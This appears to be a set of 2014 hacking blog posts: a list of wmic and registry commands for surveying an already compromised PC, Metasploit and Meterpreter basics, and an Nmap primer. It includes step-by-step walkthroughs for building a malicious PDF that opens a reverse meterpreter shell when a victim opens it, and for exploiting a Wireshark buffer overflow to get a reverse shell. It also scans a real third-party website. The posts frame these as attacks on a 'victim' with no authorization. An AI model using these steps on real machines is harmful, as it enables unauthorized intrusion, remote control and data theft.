Sunday, 2 March 2014

Forensics Investigation of Remote PC

First hack the victim PC using Metasploit (Tutorial: How to Hack Remote PC).
Once you have a meterpreter session, use the 'shell' command to get a command prompt on the target.
Now type wmic /? – displays help
wmic cpu list full – get Name, Caption, MaxClockSpeed, DeviceID, Status, etc.
wmic memorychip – get BankLabel, Capacity, Caption, CreationClassName, DataWidth, Description, DeviceLocator, FormFactor, HotSwappable, InstallDate, etc.
wmic process list full – get Caption, CommandLine, Handle, HandleCount, PageFaults, PageFileUsage, ParentProcessId, ProcessId, ThreadCount
wmic startup – get Caption, Location, Command
wmic bios – get Name, Version, SerialNumber
wmic bootconfig – get BootDirectory, Caption, TempDirectory, LastDrive
wmic useraccount – get AccountType, Description, Domain, Disabled, LocalAccount, Lockout, PasswordChangeable, PasswordExpires, PasswordRequired, SID
wmic driver – get Caption, Name, PathName, ServiceType, State, Status
wmic share – get Name, Path, Status


More wmic queries (alias, then the properties to get):
wmic baseboard get Manufacturer, Model, Name, PartNumber, SlotLayout, SerialNumber, PoweredOn
wmic cdrom get Name, Drive, VolumeName
wmic computersystem get Name, Domain, Manufacturer, Model, NumberOfProcessors, PrimaryOwnerName, UserName, Roles, TotalPhysicalMemory /format:list
wmic datafile where name='c:\\boot.ini' get Archive, FileSize, FileType, InstallDate, Readable, Writeable, System, Version
wmic dcomapp get Name, AppID /format:list
wmic desktop get Name, ScreenSaverExecutable, ScreenSaverActive, Wallpaper /format:list
wmic desktopmonitor get ScreenHeight, ScreenWidth
wmic diskdrive get Name, Manufacturer, Model, InterfaceType, MediaLoaded, MediaType
wmic diskquota get User, WarningLimit, DiskSpaceUsed, QuotaVolume
wmic environment get Description, VariableValue
wmic fsdir where name='c:\\windows' get Archive, CreationDate, LastModified, Readable, Writeable, System, Hidden, Status
wmic group get Caption, InstallDate, LocalAccount, Domain, SID, Status
wmic idecontroller get Name, Manufacturer, DeviceID, Status
wmic irq get Name, Status
wmic job get Name, Owner, DaysOfMonth, DaysOfWeek, ElapsedTime, JobStatus, StartTime, Status
wmic loadorder get Name, DriverEnabled, GroupOrder, Status
wmic logicaldisk get Name, Compressed, Description, DriveType, FileSystem, FreeSpace, SupportsDiskQuotas, VolumeDirty, VolumeName
wmic memcache get Name, BlockSize, Purpose, MaxCacheSize, Status
wmic memlogical get AvailableVirtualMemory, TotalPageFileSpace, TotalPhysicalMemory, TotalVirtualMemory
wmic memphysical get Manufacturer, Model, SerialNumber, MaxCapacity, MemoryDevices
wmic netclient get Caption, Name, Manufacturer, Status
wmic netlogin get Name, FullName, ScriptPath, Profile, UserID, NumberOfLogons, PasswordAge, LogonServer, HomeDirectory, PrimaryGroupID
wmic netprotocol get Caption, Description, GuaranteesSequencing, SupportsBroadcasting, SupportsEncryption, Status
wmic netuse get Caption, DisplayType, LocalName, Name, ProviderName, Status
wmic nic get AdapterType, AutoSense, Name, Installed, MACAddress, PNPDeviceID, PowerManagementSupported, Speed, StatusInfo
wmic nicconfig get MACAddress, DefaultIPGateway, IPAddress, IPSubnet, DNSHostName, DNSDomain
wmic ntdomain get Caption, ClientSiteName, DomainControllerAddress, DomainControllerName, Roles, Status
wmic ntevent where (LogFile='system' and SourceName='W32Time') get Message, TimeGenerated
wmic onboarddevice get Description, DeviceType, Enabled, Status
wmic os get Version, Caption, CountryCode, CSName, Description, InstallDate, SerialNumber, ServicePackMajorVersion, WindowsDirectory /format:list
wmic pagefile get Caption, CurrentUsage, Status, TempPageFile
wmic pagefileset get Name, InitialSize, MaximumSize
wmic partition get Caption, Size, PrimaryPartition, Status, Type
wmic printer get DeviceID, DriverName, Hidden, Name, PortName, PowerManagementSupported, PrintJobDataType, VerticalResolution, HorizontalResolution
wmic printjob get Description, Document, ElapsedTime, HostPrintQueue, JobID, JobStatus, Name, Notify, Owner, TimeSubmitted, TotalPages
wmic product get Description, InstallDate, Name, Vendor, Version
wmic qfe get Description, FixComments, HotFixID, InstalledBy, InstalledOn, ServicePackInEffect
wmic quotasetting get Caption, DefaultLimit, Description, DefaultWarningLimit, SettingID, State
wmic recoveros get AutoReboot, DebugFilePath, WriteDebugInfo, WriteToSystemLog
wmic registry get CurrentSize, MaximumSize, ProposedSize, Status
wmic scsicontroller get Caption, DeviceID, Manufacturer, PNPDeviceID
wmic server get ErrorsAccessPermissions, ErrorsGrantedAccess, ErrorsLogon, ErrorsSystem, FilesOpen, FileDirectorySearches
wmic service get Name, Caption, State, ServiceType, StartMode, PathName
wmic sounddev get Caption, DeviceID, PNPDeviceID, Manufacturer, Status
wmic sysaccount get Caption, Domain, Name, SID, SIDType, Status
wmic systemenclosure get Caption, Height, Depth, Manufacturer, Model, SMBIOSAssetTag, AudibleAlarm, SecurityStatus, SecurityBreach, PoweredOn, NumberOfPowerCords
wmic systemslot get Number, SlotDesignation, Status, SupportsHotPlug, Version, CurrentUsage, ConnectorPinout
wmic tapedrive get Name, Capabilities, Compression, Description, MediaType, NeedsCleaning, Status, StatusInfo
wmic timezone get Caption, Bias, DaylightBias, DaylightName, StandardName
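As an added example (not code from the original post), here is a small Python parser for the Key=Value records that the /format:list variants of the wmic queries above produce, with a triage check run over a constructed wmic useraccount listing; the account names and SIDs in the sample are made up for illustration.

```python
# Added example (not from the original post): parse the Key=Value records that
# `wmic <alias> get <properties> /format:list` prints, then triage the result.

# Constructed sample (not captured from a real host; names and SIDs are made up)
# of: wmic useraccount get Name,Disabled,LocalAccount,PasswordRequired,SID /format:list
SAMPLE_USERACCOUNT_LIST = (
    "\r\n\r\nDisabled=FALSE\r\nLocalAccount=TRUE\r\nName=Administrator\r\n"
    "PasswordRequired=TRUE\r\nSID=S-1-5-21-1111111111-2222222222-3333333333-500\r\n"
    "\r\n\r\nDisabled=FALSE\r\nLocalAccount=TRUE\r\nName=Guest\r\n"
    "PasswordRequired=FALSE\r\nSID=S-1-5-21-1111111111-2222222222-3333333333-501\r\n"
    "\r\n\r\nDisabled=TRUE\r\nLocalAccount=TRUE\r\nName=svc_backup\r\n"
    "PasswordRequired=FALSE\r\nSID=S-1-5-21-1111111111-2222222222-3333333333-1001\r\n\r\n"
)


def parse_wmic_list(text):
    """Turn /format:list output into a list of dicts, one dict per record."""
    records, current = [], {}
    for raw in text.split("\n"):
        # strip() also drops the stray \r that wmic leaves on redirected lines
        line = raw.strip()
        if not line:              # a blank line terminates the current record
            if current:
                records.append(current)
                current = {}
            continue
        key, sep, value = line.partition("=")
        if sep:                   # skip anything that is not Key=Value
            current[key.strip()] = value.strip()
    if current:
        records.append(current)
    return records


def accounts_needing_review(records):
    """Names of enabled local accounts that do not require a password.

    WMI prints booleans as the strings TRUE/FALSE, so compare against those.
    """
    return [r["Name"] for r in records
            if r.get("LocalAccount") == "TRUE"
            and r.get("Disabled") == "FALSE"
            and r.get("PasswordRequired") == "FALSE"]


if __name__ == "__main__":
    recs = parse_wmic_list(SAMPLE_USERACCOUNT_LIST)
    print(len(recs), "accounts parsed; needing review:", accounts_needing_review(recs))
```

When wmic output is redirected to a file it is written as UTF-16, so read the file with that encoding before handing the text to parse_wmic_list.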

How to Find the System Boot Time and Original Install Date

systeminfo – displays detailed configuration information about a computer and its operating system, including operating system configuration, security information, product ID, and hardware properties such as RAM, disk space, and network cards.

How to Detect the Last Connected USB

reg query HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR

How to View Recently Visited Documents

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs

How to View the Last Used Command in the Run Dialog Box

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

How to View Installed Software

reg query HKCU\Software

How to Find All Installed Drivers

driverquery – displays a list of all installed device drivers and their properties.

Saturday, 1 March 2014

Metasploit Tutorial for Beginners

The Metasploit Project is an open-source, computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the Metasploit Framework, a tool for developing and executing exploit code against a remote target machine.
Metasploit helps security and IT professionals identify security issues, verify vulnerability mitigations, and manage expert-driven security assessments.

Minimum System Requirements:
  • 2 GHz+ processor
  • 2 GB RAM available (4 GB recommended, increase accordingly with VM targets on the same device)
  • 500 MB+ available disk space
  • 10/100 Mbps network interface card
Supported Operating Systems:
  • Windows XP, 2003, Vista, 2008 Server, and Windows 7
  • Red Hat Enterprise Linux 5.x, 6.x – x86 and x86_64
  • Ubuntu Linux 8.04, 10.04 – x86 and x86_64
Required Browser Versions
  • Mozilla Firefox 4.0+
  • Microsoft Internet Explorer 9
  • Google Chrome 10+

Basic Terms of Metasploit

Vulnerability: A vulnerability is a security hole in a piece of software, hardware or operating system that provides a potential angle to attack the system. A vulnerability can be as simple as a weak password or as complex as a buffer overflow or SQL injection vulnerability.
Exploit: An "exploit" refers to a well-known bug/hole that hackers can use to gain entry into the system. To take advantage of a vulnerability, you often need an exploit, a small and highly specialized computer program whose sole reason for being is to take advantage of a specific vulnerability and to provide access to a computer system.
Payload: A payload is the piece of software that lets you control a computer system after it has been exploited. The payload is typically attached to and delivered by the exploit.

Metasploit Basic Command Tutorial

msfconsole

Help
help: it will show you the basic commands of Metasploit.

Show payloads
show payloads: it will show you all the available payloads in Metasploit.

Show exploits
show exploits: it will show you all the exploits in Metasploit.

msf> use <exploit> – to use an exploit or payload
msf exploit (name)> set payload <payload name> – to add the specified payload
msf exploit (name)> set rhost <victim ip> – to add the victim IP address to the specified exploit
msf exploit (name)> set lhost <localhost ip> – to add the attacker IP address to the specified exploit
msf exploit (name)> unset rhost – to remove the rhost value
msf exploit (name)> unset lhost – to remove the lhost value
msf exploit (name)> setg rhost <victim ip> – to add the victim IP address globally
msf exploit (name)> setg lhost <localhost> – to add the localhost (attacker) IP address globally
msf exploit (name)> sessions -l -v – to see the list of sessions

Meterpreter Basic Commands

Help

The ‘help’ command, as may be expected, displays the Meterpreter help menu.

PS

The ‘ps’ command displays a list of running processes on the target.

LS

As in Linux, the ‘ls’ command will list the files in the current remote directory.

Ipconfig

The ‘ipconfig’ command displays the network interfaces and addresses on the remote machine.

Getuid

Running ‘getuid’ will display the user that the Meterpreter server is running as on the host.

Download

The ‘download’ command downloads a file from the remote machine. Note the use of the double-slashes when giving the Windows path.

Upload

As with the ‘download’ command, you need to use double-slashes with the ‘upload’ command.

Shell

The ‘shell’ command will present you with a standard shell on the target system.

How to Hack Remote PC using PDF

Adobe FlateDecode Stream Predictor 02 Integer Overflow
This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions before 9.2.
Exploit Targets
0 – Adobe Reader Windows Universal (JS Heap Spray) (default)
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open a Backtrack terminal and type msfconsole
Now type use exploit/windows/fileformat/adobe_flatedecode_predictor02
msf exploit (adobe_flatedecode_predictor02)> set payload windows/meterpreter/reverse_tcp
msf exploit (adobe_flatedecode_predictor02)> show options
msf exploit (adobe_flatedecode_predictor02)> set lhost 192.168.1.3 (IP of local host)
msf exploit (adobe_flatedecode_predictor02)> set filename attack.pdf
msf exploit (adobe_flatedecode_predictor02)> exploit
After the malicious PDF is generated successfully, it will be stored on your local computer at
/root/.msf4/local/attack.pdf
Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit executes successfully.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.3
exploit
Now send the attack.pdf file to the victim; as soon as they download and open it, you can access a meterpreter shell on the victim's computer.

Attacking on Remote PC if Victim is using Wireshark

Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow
The LWRES dissector in Wireshark versions 0.9.15 through 1.0.10 and 1.2.0 through 1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer overflow. This bug was found and reported by babi. This particular exploit targets the dissect_getaddrsbyname_request function. Several other functions also contain potentially exploitable stack-based buffer overflows. The Windows version (of 1.2.5 at least) is compiled with /GS, which prevents exploitation via the return address on the stack. Sending a larger string allows exploitation using the SEH bypass method. However, this packet will usually get fragmented, which may cause additional complications. NOTE: The vulnerable code is reached only when the packet dissection is rendered. If the packet is fragmented, all fragments must be captured and reassembled to exploit this issue.
Exploit Targets
0 – tshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)
1 – wireshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)
2 – wireshark 1.2.5 on RHEL 5.4 (x64)
3 – wireshark 1.2.5 on Mac OS X 10.5 (x86)
4 – wireshark/tshark 1.2.1 and 1.2.5 on Windows (x86)
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open a Backtrack terminal and type msfconsole
Now type use exploit/multi/misc/wireshark_lwres_getaddrbyname_loop
msf exploit (wireshark_lwres_getaddrbyname_loop)> set payload windows/shell_reverse_tcp
msf exploit (wireshark_lwres_getaddrbyname_loop)> set lhost 192.168.1.2 (IP of local host)
msf exploit (wireshark_lwres_getaddrbyname_loop)> exploit
Before running the exploit command, let's say that the victim is still capturing traffic with their Wireshark tool, as in the picture below.
Now you have access to the victim's PC. Use "sessions -l" to find the session number, then type "sessions -i <ID>" to connect to the session.

How to use Nmap (Beginner Tutorial)

Nmap ("Network Mapper") is a free and open source utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.
First download Nmap and install it on your PC.

How to Detect All Connected PCs in the Network

nmap -sn 192.168.0.100/24

How to Scan the Network Excluding a Specific Host

nmap --exclude 192.168.0.108 192.168.0.1/24

How to Detect the Installed OS on a Remote PC

nmap -O 192.168.0.102

How to Scan All TCP Ports on All Remote PCs

nmap -sT 192.168.0.100/24

How to Scan All UDP Ports on a Remote PC

nmap -sU 192.168.0.102

How to Scan IP Protocols

nmap -sO 192.168.0.102

How to Detect Services on a Remote PC

nmap -sV 192.168.1.2

How to Scan the Name Server of a Website

nmap -sV -T4 -F www.upscportal.in